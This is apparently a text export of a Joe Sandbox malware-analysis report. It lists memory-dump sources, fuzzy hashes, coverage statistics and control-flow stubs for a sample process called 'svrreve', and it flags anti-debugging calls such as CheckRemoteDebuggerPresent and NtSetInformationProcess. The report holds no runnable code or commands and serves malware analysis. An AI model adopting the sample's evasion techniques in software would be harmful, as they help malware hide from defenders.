                            • Instruction ID: 7728b7c0778d86a9afb5bf0e6f6c893457ef9fe88197b3e7018420dcd2d15216
                            • Opcode Fuzzy Hash: 8edb2084d7acefd27ac83791b9a0fb48fe9a3751335f21b4a1527f6e5019135c
                            • Instruction Fuzzy Hash: 65F0F63194D78E4FD352EBB448696E97FA0EF55310F4904EAD4A9CB0E3EA691594C302
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 202de2c2868f0f444ce05466567b30b3302dd3482b8f78976be3b70502c047b4
                            • Instruction ID: 7eabd5ba780c8a72ad06c3b5e0918b1fb518dc456fee15e69cc4ba6c111c0ed9
                            • Opcode Fuzzy Hash: 202de2c2868f0f444ce05466567b30b3302dd3482b8f78976be3b70502c047b4
                            • Instruction Fuzzy Hash: 21F06D70D0999D4FDBE4DB688896BD9B7F1EF58300F0480E9814CD7251DA745EC18B80
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7624f546e68dbad6aff547e0bbf78269f9e1b40b0d725c512a9e978785545d5f
                            • Instruction ID: 308c3326a285cd0b85e6e1f51c6e9f69bc0f766d8c2481643a729a6dec0c896d
                            • Opcode Fuzzy Hash: 7624f546e68dbad6aff547e0bbf78269f9e1b40b0d725c512a9e978785545d5f
                            • Instruction Fuzzy Hash: FEF0F870A0895D8FDB91EB288864BE8BBF4FF19300F0404E5D44DE7162DA3499C2CB00

                            Execution Graph

                            Execution Coverage: 13%
                            Dynamic/Decrypted Code Coverage: 100%
                            Signature Coverage: 75%
                            Total number of Nodes: 12
                            Total number of Limit Nodes: 0

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2307759075.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ffd9ba10000_svrreve.jbxd
                            Similarity
                            • API ID: InformationProcess
                            • String ID:
                            • API String ID: 1801817001-0
                            • Opcode ID: 0f1710ee027cdeef47de3b3ce8c24f2f576527356f2045980aa7480215239744
                            • Instruction ID: f3d9a47862966f786199c967ecf746493cf3a1c4241539351dd0dae14f953828
                            • Opcode Fuzzy Hash: 0f1710ee027cdeef47de3b3ce8c24f2f576527356f2045980aa7480215239744
                            • Instruction Fuzzy Hash: 7D51487091874C8FDB58EF98C895AEDBBF1FB59310F1052AED04AE3251DB71A981CB81

                            Control-flow Graph

                            • Node 8: 7ffd9ba11322-7ffd9ba17c76, calls NtSetInformationProcess
                            • Node 12: 7ffd9ba17c7e-7ffd9ba17cce
                            • Node 13: 7ffd9ba17c78
                            • Edges: 8 -> 12, 8 -> 13, 13 -> 12
                            • Node colouring (Executed / Not Executed) is not preserved in the text export
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2307759075.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ffd9ba10000_svrreve.jbxd
                            Similarity
                            • API ID: InformationProcess
                            • String ID:
                            • API String ID: 1801817001-0
                            • Opcode ID: f28b0fe7beeb974bc2f989d988dc63d8a579b55071f9cfb1286e840d6ac44309
                            • Instruction ID: 5f2f7cfec1873898710c5e6078fe374850b6d61d3b78a678b776ce741b055411
                            • Opcode Fuzzy Hash: f28b0fe7beeb974bc2f989d988dc63d8a579b55071f9cfb1286e840d6ac44309
                            • Instruction Fuzzy Hash: A0512870A1860C8FDF58EF98C895AEDBBF1FB59310F10516ED44AE3251DB70A981CB81

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2307759075.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ffd9ba10000_svrreve.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0

                            Control-flow Graph

                            control_flow_graph 25 7ffd9ba11312-7ffd9ba17ab8 CheckRemoteDebuggerPresent 29 7ffd9ba17ac0-7ffd9ba17b2c 25->29 30 7ffd9ba17aba 25->30 30->29
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2307759075.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ffd9ba10000_svrreve.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID: 1N_^
                            • API String ID: 0-2316127021
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID: 1N_^
                            • API String ID: 0-2316127021
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd